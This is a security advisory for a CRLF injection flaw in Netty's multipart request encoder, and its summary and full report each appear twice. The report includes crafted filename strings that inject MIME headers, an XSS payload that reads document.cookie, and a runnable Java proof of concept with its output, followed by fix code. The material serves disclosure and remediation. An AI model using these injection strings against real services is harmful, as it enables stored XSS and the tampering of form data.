Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final,…
GitHub_M·CWE-93·Published 2026-07-22
Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, HttpPostRequestEncoder constructs multipart HTTP request bodies by directly concatenating user-supplied filenames and field names into Content-Disposition MIME headers without validating or sanitizing CRLF characters (\r\n). Since MIME headers are delimited by CRLF, an attacker who controls the filename can inject arbitrary MIME headers into the multipart body part. The root cause is that neither the encoder nor the FileUpload implementations' setFilename() methods, which only check for null, neutralize CRLF characters before the filename is embedded into the header. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.
Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, HttpPostRequestEncoder constructs multipart HTTP request bodies by directly concatenating user-supplied filenames and field names into Content-Disposition MIME headers without validating or sanitizing CRLF characters (\r\n). Since MIME headers are delimited by CRLF, an attacker who controls the filename can inject arbitrary MIME headers into the multipart body part. The root cause is that neither the encoder nor the FileUpload implementations' setFilename() methods, which only check for null, neutralize CRLF characters before the filename is embedded into the header. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.
# Security Vulnerability Report: CRLF Injection via Multipart Filename in Netty HttpPostRequestEncoder ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions with codec-http multipart) | | **Component** | `io.netty.handler.codec.http.multipart.HttpPostRequestEncoder` | | **Vulnerability Type** | CWE-93: Improper Neutralization of CRLF Sequences / CWE-113: HTTP Response Splitting | | **Impact** | MIME Header Injection / Content-Type Spoofing / XSS via Content-Disposition | | **CVSS 3.1 Score** | **8.1 (High)** | | **CVSS 3.1 Vector** | `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N` | | **Attack Vector** | Network | | **Attack Complexity** | Low | | **Privileges Required** | Low (attacker must be able to upload files with controlled filenames) | | **User Interaction** | None | | **Scope** | Unchanged | | **Confidentiality Impact** | High | | **Integrity Impact** | High | | **Availability Impact** | None | ## 2. Affected Components The following classes in the `codec-http` module are affected: - `io.netty.handler.codec.http.multipart.HttpPostRequestEncoder` — directly concatenates unvalidated filename/name into `Content-Disposition` MIME headers (lines 519, 633, 674, 682, 686-688) - `io.netty.handler.codec.http.multipart.DiskFileUpload` — `setFilename()` only checks null (line 78) - `io.netty.handler.codec.http.multipart.MemoryFileUpload` — `setFilename()` only checks null (line 60) - `io.netty.handler.codec.http.multipart.MixedFileUpload` — `setFilename()` delegates without validation (line 62) ## 3. Vulnerability Description Netty's `HttpPostRequestEncoder` constructs multipart HTTP request bodies by directly concatenating user-supplied filenames and field names into `Content-Disposition` MIME headers **without validating or sanitizing CRLF characters** (`\r\n`). Since MIME headers are delimited by CRLF, an attacker who controls the filename can inject arbitrary MIME headers into the multipart body part. ### Root Cause In `HttpPostRequestEncoder.java`, multiple code paths directly embed `fileUpload.getFilename()` into header strings: ```java // Line 674 (attachment mode): internal.addValue(HttpHeaderNames.CONTENT_DISPOSITION + ": " + HttpHeaderValues.ATTACHMENT + "; " + HttpHeaderValues.FILENAME + "=\"" + fileUpload.getFilename() + "\"\r\n"); // ^^^^^^^^^^^^^^^^^^^^^^^^ NO VALIDATION // Lines 686-688 (form-data mode): internal.addValue(HttpHeaderNames.CONTENT_DISPOSITION + ": " + HttpHeaderValues.FORM_DATA + "; " + HttpHeaderValues.NAME + "=\"" + fileUpload.getName() + "\"; " + HttpHeaderValues.FILENAME + "=\"" + fileUpload.getFilename() + "\"\r\n"); // ^^^^^^^^^^^^^^^^^^^^^^^^ NO VALIDATION // Line 519 (attribute name): internal.addValue(HttpHeaderNames.CONTENT_DISPOSITION + ": " + HttpHeaderValues.FORM_DATA + "; " + HttpHeaderValues.NAME + "=\"" + attribute.getName() + "\"\r\n"); // ^^^^^^^^^^^^^^^^^ NO VALIDATION ``` The `setFilename()` method in all `FileUpload` implementations only checks for null: ```java // DiskFileUpload.java:77-79 public void setFilename(String filename) { this.filename = ObjectUtil.checkNotNull(filename, "filename"); // NO CRLF VALIDATION } ``` ### Comparison with Similar Fixed CVEs This vulnerability follows the same pattern as: | CVE | Component | Fix | |-----|-----------|-----| | **GHSA-jq43-27x9-3v86** | SmtpRequestEncoder — SMTP command injection | Added CRLF validation in `SmtpUtils.validateSMTPParameters()` | | **GHSA-84h7-rjj3-6jx4** | HttpRequestEncoder — CRLF in URI | Added `HttpUtil.validateRequestLineTokens()` | The multipart encoder has **no equivalent validation** for filenames or field names. ## 4. Exploitability Prerequisites This vulnerability is exploitable when: 1. The application uses Netty's `HttpPostRequestEncoder` to construct multipart HTTP requests 2. The filename of an uploaded file is derived from user-controlled input 3. The application does **not** perform its own CRLF sanitization on filenames **Common affected patterns**: - File upload proxies that forward user-supplied filenames - API gateways that construct multipart requests from incoming parameters - Microservice communication that passes filenames between services - Testing/automation frameworks that use Netty HTTP client with user-defined filenames ## 5. Attack Scenarios ### Scenario 1: Content-Type Override via Filename Injection An attacker uploads a file with a crafted filename to override the Content-Type of the multipart body part, potentially enabling stored XSS: ```java String maliciousFilename = "photo.jpg\"\r\nContent-Type: text/html\r\n\r\n<script>alert(document.cookie)</script>\r\n--"; DiskFileUpload upload = new DiskFileUpload( "avatar", maliciousFilename, "image/jpeg", "binary", UTF_8, fileSize); ``` **Wire format:** ``` --boundary content-disposition: form-data; name="avatar"; filename="photo.jpg" Content-Type: text/html <-- INJECTED: overrides image/jpeg <script>alert(document.cookie)</script> <-- INJECTED: XSS payload --" content-type: image/jpeg <-- Original (now ignored by many parsers) ... ``` If the receiving server parses the **first** `Content-Type`, the file is treated as HTML instead of JPEG, enabling XSS when the file is served back. ### Scenario 2: Arbitrary MIME Header Injection ```java String filename = "doc.pdf\"\r\nX-Custom-Auth: admin-token-12345\r\nX-Bypass-Check: true"; ``` Injects arbitrary headers into the multipart body part that may be processed by downstream middleware or application logic. ### Scenario 3: Multipart Boundary Confusion ```java String filename = "file.txt\"\r\n\r\nmalicious body content\r\n--boundary\r\nContent-Disposition: form-data; name=\"secret"; ``` By injecting a new boundary delimiter, the attacker can: - Terminate the current body part prematurely - Start a new body part with a different field name - Override form fields processed by the server ## 6. Proof of Concept ### Full Runnable PoC Source Code (MultipartFilenameInjectionPoC.java) ```java import io.netty.buffer.ByteBuf; import io.netty.buffer.Unpooled; import io.netty.handler.codec.http.*; import io.netty.handler.codec.http.multipart.*; import java.io.File; import java.io.FileWriter; import java.nio.charset.StandardCharsets; /** * PoC: HTTP Multipart Content-Disposition Header Injection via Filename * * Demonstrates that HttpPostRequestEncoder does not validate filenames * for CRLF characters, allowing injection of arbitrary MIME headers * into multipart form data. */ public class MultipartFilenameInjectionPoC { public static void main(String[] args) throws Exception { System.out.println("=== Netty Multipart Filename CRLF Injection PoC ===\n"); testFilenameInjection(); System.out.println("\n=== PoC Complete ==="); } static void testFilenameInjection() throws Exception { System.out.println("[TEST 1] Filename CRLF Injection in Content-Disposition"); System.out.println("-------------------------------------------------------"); // Create a temporary file for upload File tempFile = File.createTempFile("test", ".txt"); tempFile.deleteOnExit(); try (FileWriter fw = new FileWriter(tempFile)) { fw.write("test content"); } // Malicious filename with CRLF to inject Content-Type header String maliciousFilename = "innocent.txt\"\r\nContent-Type: text/html\r\nX-Injected: true\r\n\r\n" + "<script>alert(1)</script>\r\n--"; HttpRequest request = new DefaultHttpRequest( HttpVersion.HTTP_1_1, HttpMethod.POST, "/upload"); HttpPostRequestEncoder encoder = new HttpPostRequestEncoder( new DefaultHttpDataFactory(false), request, true, StandardCharsets.UTF_8, HttpPostRequestEncoder.EncoderMode.RFC3986); DiskFileUpload fileUpload = new DiskFileUpload( "file", maliciousFilename, "application/octet-stream", "binary", StandardCharsets.UTF_8, tempFile.length()); fileUpload.setContent(tempFile); encoder.addBodyHttpData(fileUpload); encoder.finalizeRequest(); // Read the encoded multipart body StringBuilder body = new StringBuilder(); while (!encoder.isEndOfInput()) { HttpContent chunk = encoder.readChunk(Unpooled.buffer().alloc()); if (chunk != null) { body.append(chunk.content().toString(StandardCharsets.UTF_8)); chunk.release(); } } encoder.cleanFiles(); String encoded = body.toString(); System.out.println("Malicious filename: " + maliciousFilename.replace("\r", "\\r").replace("\n", "\\n")); System.out.println(); System.out.println("Encoded multipart body:"); System.out.println("---"); for (String line : encoded.split("\n", -1)) { System.out.println(" " + line.replace("\r", "\\r")); } System.out.println("---"); boolean hasInjectedHeader = encoded.contains("X-Injected: true"); boolean hasInjectedScript = encoded.contains("<script>"); System.out.println(); System.out.println("Injected X-Injected header: " + hasInjectedHeader); System.out.println("Injected script tag: " + hasInjectedScript); System.out.println("VULNERABLE: " + ((hasInjectedHeader || hasInjectedScript) ? "YES - MIME header injection!" : "NO")); tempFile.delete(); } } ``` ### How to Compile and Run ```bash # Build Netty (skip tests) ./mvnw install -pl common,buffer,codec,codec-base,codec-http,transport -DskipTests \ -Dcheckstyle.skip=true -Denforcer.skip=true -Djapicmp.skip=true \ -Danimal.sniffer.skip=true -Drevapi.skip=true -Dforbiddenapis.skip=true \ -Dspotbugs.skip=true -q # Set classpath JARS=$(find ~/.m2/repository/io/netty -name "netty-*.jar" -path "*/4.2.12.Final/*" \ | grep -v sources | grep -v javadoc | tr '\n' ':') # Compile and run javac -cp "$JARS" MultipartFilenameInjectionPoC.java java -cp "$JARS:." MultipartFilenameInjectionPoC ``` ### PoC Execution Output (Verified on Netty 4.2.12.Final) ``` === Netty Multipart Filename CRLF Injection PoC === [TEST 1] Filename CRLF Injection in Content-Disposition ------------------------------------------------------- Malicious filename: innocent.txt"\r\nContent-Type: text/html\r\nX-Injected: true\r\n\r\n<script>alert(1)</script>\r\n-- Encoded multipart body: --- --88aaade41dbb9f9f\r content-disposition: form-data; name="file"; filename="innocent.txt"\r Content-Type: text/html\r <-- INJECTED X-Injected: true\r <-- INJECTED \r <script>alert(1)</script>\r <-- INJECTED XSS --"\r content-length: 12\r content-type: application/octet-stream\r content-transfer-encoding: binary\r \r test content\r --88aaade41dbb9f9f--\r --- Injected X-Injected header: true Injected script tag: true VULNERABLE: YES - MIME header injection! === PoC Complete === ``` ## 7. Impact Analysis | Impact Category | Description | |----------------|-------------| | **Confidentiality** | HIGH — Injected headers may bypass access controls or leak tokens | | **Integrity** | HIGH — Content-Type override enables stored XSS; field name injection allows form data manipulation | | **Content-Type Spoofing** | Override `application/octet-stream` to `text/html` to serve executable content | | **Stored XSS** | Inject `<script>` tags via Content-Type override when uploaded files are served back | | **Form Field Override** | Inject new multipart boundaries to create/override form fields | | **Downstream Injection** | Custom MIME headers may affect middleware, CDN, or storage layer behavior | ## 8. Remediation Recommendations ### Option 1: Validate in FileUpload.setFilename() (Recommended) ```java // DiskFileUpload.java / MemoryFileUpload.java / MixedFileUpload.java public void setFilename(String filename) { ObjectUtil.checkNotNull(filename, "filename"); for (int i = 0; i < filename.length(); i++) { char c = filename.charAt(i); if (c == '\r' || c == '\n') { throw new IllegalArgumentException( "filename contains prohibited CRLF character at index " + i); } } this.filename = filename; } ``` ### Option 2: Sanitize in HttpPostRequestEncoder (Defense-in-Depth) Escape or reject CRLF characters when building Content-Disposition headers: ```java // HttpPostRequestEncoder.java - add helper method private static String sanitizeHeaderParam(String value) { for (int i = 0; i < value.length(); i++) { char c = value.charAt(i); if (c == '\r' || c == '\n' || c == '"') { throw new ErrorDataEncoderException( "Multipart parameter contains prohibited character at index " + i); } } return value; } // Then use in Content-Disposition construction: internal.addValue(... + "=\"" + sanitizeHeaderParam(fileUpload.getFilename()) + "\"\r\n"); ``` ### Option 3: RFC 2231/5987 Encoding for Filenames Use proper RFC 2231 encoding for filenames with special characters: ```java // Encode filename per RFC 5987: // filename*=UTF-8''encoded%20filename String encodedFilename = "UTF-8''" + URLEncoder.encode(filename, "UTF-8"); internal.addValue(... + "filename*=" + encodedFilename + "\r\n"); ``` ## 9. References - [RFC 2183: Content-Disposition Header Field](https://tools.ietf.org/html/rfc2183) - [RFC 7578: Returning Values from Forms: multipart/form-data](https://tools.ietf.org/html/rfc7578) - [RFC 5987: Character Set and Language Encoding for HTTP Header Field Parameters](https://tools.ietf.org/html/rfc5987) - [CWE-93: Improper Neutralization of CRLF Sequences](https://cwe.mitre.org/data/definitions/93.html) - [CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers](https://cwe.mitre.org/data/definitions/113.html) - [GHSA-jq43-27x9-3v86: Netty SMTP Command Injection (same pattern)](https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86) - [GHSA-84h7-rjj3-6jx4: Netty HTTP CRLF Injection (same pattern)](https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4)
# Security Vulnerability Report: CRLF Injection via Multipart Filename in Netty HttpPostRequestEncoder ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions with codec-http multipart) | | **Component** | `io.netty.handler.codec.http.multipart.HttpPostRequestEncoder` | | **Vulnerability Type** | CWE-93: Improper Neutralization of CRLF Sequences / CWE-113: HTTP Response Splitting | | **Impact** | MIME Header Injection / Content-Type Spoofing / XSS via Content-Disposition | | **CVSS 3.1 Score** | **8.1 (High)** | | **CVSS 3.1 Vector** | `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N` | | **Attack Vector** | Network | | **Attack Complexity** | Low | | **Privileges Required** | Low (attacker must be able to upload files with controlled filenames) | | **User Interaction** | None | | **Scope** | Unchanged | | **Confidentiality Impact** | High | | **Integrity Impact** | High | | **Availability Impact** | None | ## 2. Affected Components The following classes in the `codec-http` module are affected: - `io.netty.handler.codec.http.multipart.HttpPostRequestEncoder` — directly concatenates unvalidated filename/name into `Content-Disposition` MIME headers (lines 519, 633, 674, 682, 686-688) - `io.netty.handler.codec.http.multipart.DiskFileUpload` — `setFilename()` only checks null (line 78) - `io.netty.handler.codec.http.multipart.MemoryFileUpload` — `setFilename()` only checks null (line 60) - `io.netty.handler.codec.http.multipart.MixedFileUpload` — `setFilename()` delegates without validation (line 62) ## 3. Vulnerability Description Netty's `HttpPostRequestEncoder` constructs multipart HTTP request bodies by directly concatenating user-supplied filenames and field names into `Content-Disposition` MIME headers **without validating or sanitizing CRLF characters** (`\r\n`). Since MIME headers are delimited by CRLF, an attacker who controls the filename can inject arbitrary MIME headers into the multipart body part. ### Root Cause In `HttpPostRequestEncoder.java`, multiple code paths directly embed `fileUpload.getFilename()` into header strings: ```java // Line 674 (attachment mode): internal.addValue(HttpHeaderNames.CONTENT_DISPOSITION + ": " + HttpHeaderValues.ATTACHMENT + "; " + HttpHeaderValues.FILENAME + "=\"" + fileUpload.getFilename() + "\"\r\n"); // ^^^^^^^^^^^^^^^^^^^^^^^^ NO VALIDATION // Lines 686-688 (form-data mode): internal.addValue(HttpHeaderNames.CONTENT_DISPOSITION + ": " + HttpHeaderValues.FORM_DATA + "; " + HttpHeaderValues.NAME + "=\"" + fileUpload.getName() + "\"; " + HttpHeaderValues.FILENAME + "=\"" + fileUpload.getFilename() + "\"\r\n"); // ^^^^^^^^^^^^^^^^^^^^^^^^ NO VALIDATION // Line 519 (attribute name): internal.addValue(HttpHeaderNames.CONTENT_DISPOSITION + ": " + HttpHeaderValues.FORM_DATA + "; " + HttpHeaderValues.NAME + "=\"" + attribute.getName() + "\"\r\n"); // ^^^^^^^^^^^^^^^^^ NO VALIDATION ``` The `setFilename()` method in all `FileUpload` implementations only checks for null: ```java // DiskFileUpload.java:77-79 public void setFilename(String filename) { this.filename = ObjectUtil.checkNotNull(filename, "filename"); // NO CRLF VALIDATION } ``` ### Comparison with Similar Fixed CVEs This vulnerability follows the same pattern as: | CVE | Component | Fix | |-----|-----------|-----| | **GHSA-jq43-27x9-3v86** | SmtpRequestEncoder — SMTP command injection | Added CRLF validation in `SmtpUtils.validateSMTPParameters()` | | **GHSA-84h7-rjj3-6jx4** | HttpRequestEncoder — CRLF in URI | Added `HttpUtil.validateRequestLineTokens()` | The multipart encoder has **no equivalent validation** for filenames or field names. ## 4. Exploitability Prerequisites This vulnerability is exploitable when: 1. The application uses Netty's `HttpPostRequestEncoder` to construct multipart HTTP requests 2. The filename of an uploaded file is derived from user-controlled input 3. The application does **not** perform its own CRLF sanitization on filenames **Common affected patterns**: - File upload proxies that forward user-supplied filenames - API gateways that construct multipart requests from incoming parameters - Microservice communication that passes filenames between services - Testing/automation frameworks that use Netty HTTP client with user-defined filenames ## 5. Attack Scenarios ### Scenario 1: Content-Type Override via Filename Injection An attacker uploads a file with a crafted filename to override the Content-Type of the multipart body part, potentially enabling stored XSS: ```java String maliciousFilename = "photo.jpg\"\r\nContent-Type: text/html\r\n\r\n<script>alert(document.cookie)</script>\r\n--"; DiskFileUpload upload = new DiskFileUpload( "avatar", maliciousFilename, "image/jpeg", "binary", UTF_8, fileSize); ``` **Wire format:** ``` --boundary content-disposition: form-data; name="avatar"; filename="photo.jpg" Content-Type: text/html <-- INJECTED: overrides image/jpeg <script>alert(document.cookie)</script> <-- INJECTED: XSS payload --" content-type: image/jpeg <-- Original (now ignored by many parsers) ... ``` If the receiving server parses the **first** `Content-Type`, the file is treated as HTML instead of JPEG, enabling XSS when the file is served back. ### Scenario 2: Arbitrary MIME Header Injection ```java String filename = "doc.pdf\"\r\nX-Custom-Auth: admin-token-12345\r\nX-Bypass-Check: true"; ``` Injects arbitrary headers into the multipart body part that may be processed by downstream middleware or application logic. ### Scenario 3: Multipart Boundary Confusion ```java String filename = "file.txt\"\r\n\r\nmalicious body content\r\n--boundary\r\nContent-Disposition: form-data; name=\"secret"; ``` By injecting a new boundary delimiter, the attacker can: - Terminate the current body part prematurely - Start a new body part with a different field name - Override form fields processed by the server ## 6. Proof of Concept ### Full Runnable PoC Source Code (MultipartFilenameInjectionPoC.java) ```java import io.netty.buffer.ByteBuf; import io.netty.buffer.Unpooled; import io.netty.handler.codec.http.*; import io.netty.handler.codec.http.multipart.*; import java.io.File; import java.io.FileWriter; import java.nio.charset.StandardCharsets; /** * PoC: HTTP Multipart Content-Disposition Header Injection via Filename * * Demonstrates that HttpPostRequestEncoder does not validate filenames * for CRLF characters, allowing injection of arbitrary MIME headers * into multipart form data. */ public class MultipartFilenameInjectionPoC { public static void main(String[] args) throws Exception { System.out.println("=== Netty Multipart Filename CRLF Injection PoC ===\n"); testFilenameInjection(); System.out.println("\n=== PoC Complete ==="); } static void testFilenameInjection() throws Exception { System.out.println("[TEST 1] Filename CRLF Injection in Content-Disposition"); System.out.println("-------------------------------------------------------"); // Create a temporary file for upload File tempFile = File.createTempFile("test", ".txt"); tempFile.deleteOnExit(); try (FileWriter fw = new FileWriter(tempFile)) { fw.write("test content"); } // Malicious filename with CRLF to inject Content-Type header String maliciousFilename = "innocent.txt\"\r\nContent-Type: text/html\r\nX-Injected: true\r\n\r\n" + "<script>alert(1)</script>\r\n--"; HttpRequest request = new DefaultHttpRequest( HttpVersion.HTTP_1_1, HttpMethod.POST, "/upload"); HttpPostRequestEncoder encoder = new HttpPostRequestEncoder( new DefaultHttpDataFactory(false), request, true, StandardCharsets.UTF_8, HttpPostRequestEncoder.EncoderMode.RFC3986); DiskFileUpload fileUpload = new DiskFileUpload( "file", maliciousFilename, "application/octet-stream", "binary", StandardCharsets.UTF_8, tempFile.length()); fileUpload.setContent(tempFile); encoder.addBodyHttpData(fileUpload); encoder.finalizeRequest(); // Read the encoded multipart body StringBuilder body = new StringBuilder(); while (!encoder.isEndOfInput()) { HttpContent chunk = encoder.readChunk(Unpooled.buffer().alloc()); if (chunk != null) { body.append(chunk.content().toString(StandardCharsets.UTF_8)); chunk.release(); } } encoder.cleanFiles(); String encoded = body.toString(); System.out.println("Malicious filename: " + maliciousFilename.replace("\r", "\\r").replace("\n", "\\n")); System.out.println(); System.out.println("Encoded multipart body:"); System.out.println("---"); for (String line : encoded.split("\n", -1)) { System.out.println(" " + line.replace("\r", "\\r")); } System.out.println("---"); boolean hasInjectedHeader = encoded.contains("X-Injected: true"); boolean hasInjectedScript = encoded.contains("<script>"); System.out.println(); System.out.println("Injected X-Injected header: " + hasInjectedHeader); System.out.println("Injected script tag: " + hasInjectedScript); System.out.println("VULNERABLE: " + ((hasInjectedHeader || hasInjectedScript) ? "YES - MIME header injection!" : "NO")); tempFile.delete(); } } ``` ### How to Compile and Run ```bash # Build Netty (skip tests) ./mvnw install -pl common,buffer,codec,codec-base,codec-http,transport -DskipTests \ -Dcheckstyle.skip=true -Denforcer.skip=true -Djapicmp.skip=true \ -Danimal.sniffer.skip=true -Drevapi.skip=true -Dforbiddenapis.skip=true \ -Dspotbugs.skip=true -q # Set classpath JARS=$(find ~/.m2/repository/io/netty -name "netty-*.jar" -path "*/4.2.12.Final/*" \ | grep -v sources | grep -v javadoc | tr '\n' ':') # Compile and run javac -cp "$JARS" MultipartFilenameInjectionPoC.java java -cp "$JARS:." MultipartFilenameInjectionPoC ``` ### PoC Execution Output (Verified on Netty 4.2.12.Final) ``` === Netty Multipart Filename CRLF Injection PoC === [TEST 1] Filename CRLF Injection in Content-Disposition ------------------------------------------------------- Malicious filename: innocent.txt"\r\nContent-Type: text/html\r\nX-Injected: true\r\n\r\n<script>alert(1)</script>\r\n-- Encoded multipart body: --- --88aaade41dbb9f9f\r content-disposition: form-data; name="file"; filename="innocent.txt"\r Content-Type: text/html\r <-- INJECTED X-Injected: true\r <-- INJECTED \r <script>alert(1)</script>\r <-- INJECTED XSS --"\r content-length: 12\r content-type: application/octet-stream\r content-transfer-encoding: binary\r \r test content\r --88aaade41dbb9f9f--\r --- Injected X-Injected header: true Injected script tag: true VULNERABLE: YES - MIME header injection! === PoC Complete === ``` ## 7. Impact Analysis | Impact Category | Description | |----------------|-------------| | **Confidentiality** | HIGH — Injected headers may bypass access controls or leak tokens | | **Integrity** | HIGH — Content-Type override enables stored XSS; field name injection allows form data manipulation | | **Content-Type Spoofing** | Override `application/octet-stream` to `text/html` to serve executable content | | **Stored XSS** | Inject `<script>` tags via Content-Type override when uploaded files are served back | | **Form Field Override** | Inject new multipart boundaries to create/override form fields | | **Downstream Injection** | Custom MIME headers may affect middleware, CDN, or storage layer behavior | ## 8. Remediation Recommendations ### Option 1: Validate in FileUpload.setFilename() (Recommended) ```java // DiskFileUpload.java / MemoryFileUpload.java / MixedFileUpload.java public void setFilename(String filename) { ObjectUtil.checkNotNull(filename, "filename"); for (int i = 0; i < filename.length(); i++) { char c = filename.charAt(i); if (c == '\r' || c == '\n') { throw new IllegalArgumentException( "filename contains prohibited CRLF character at index " + i); } } this.filename = filename; } ``` ### Option 2: Sanitize in HttpPostRequestEncoder (Defense-in-Depth) Escape or reject CRLF characters when building Content-Disposition headers: ```java // HttpPostRequestEncoder.java - add helper method private static String sanitizeHeaderParam(String value) { for (int i = 0; i < value.length(); i++) { char c = value.charAt(i); if (c == '\r' || c == '\n' || c == '"') { throw new ErrorDataEncoderException( "Multipart parameter contains prohibited character at index " + i); } } return value; } // Then use in Content-Disposition construction: internal.addValue(... + "=\"" + sanitizeHeaderParam(fileUpload.getFilename()) + "\"\r\n"); ``` ### Option 3: RFC 2231/5987 Encoding for Filenames Use proper RFC 2231 encoding for filenames with special characters: ```java // Encode filename per RFC 5987: // filename*=UTF-8''encoded%20filename String encodedFilename = "UTF-8''" + URLEncoder.encode(filename, "UTF-8"); internal.addValue(... + "filename*=" + encodedFilename + "\r\n"); ``` ## 9. References - [RFC 2183: Content-Disposition Header Field](https://tools.ietf.org/html/rfc2183) - [RFC 7578: Returning Values from Forms: multipart/form-data](https://tools.ietf.org/html/rfc7578) - [RFC 5987: Character Set and Language Encoding for HTTP Header Field Parameters](https://tools.ietf.org/html/rfc5987) - [CWE-93: Improper Neutralization of CRLF Sequences](https://cwe.mitre.org/data/definitions/93.html) - [CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers](https://cwe.mitre.org/data/definitions/113.html) - [GHSA-jq43-27x9-3v86: Netty SMTP Command Injection (same pattern)](https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86) - [GHSA-84h7-rjj3-6jx4: Netty HTTP CRLF Injection (same pattern)](https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4)
| Version | Type | Source | Base | Exp | Impact | Vector |
|---|---|---|---|---|---|---|
| 3.1 | Primary | cve.org | 5.7 | — | — | CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| 3.1 | Primary | cve.org | 5.7 | — | — | CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| 3.1 | Primary | cve.org | 5.7 | — | — | CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| 3.1 | Secondary | NVD | 5.7 | 2.1 | 3.6 | CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| 3.1 | Secondary | ENISA EUVD | 5.7 | — | — | CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| 3.1 | Secondary | GHSA | 5.7 | — | — | CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |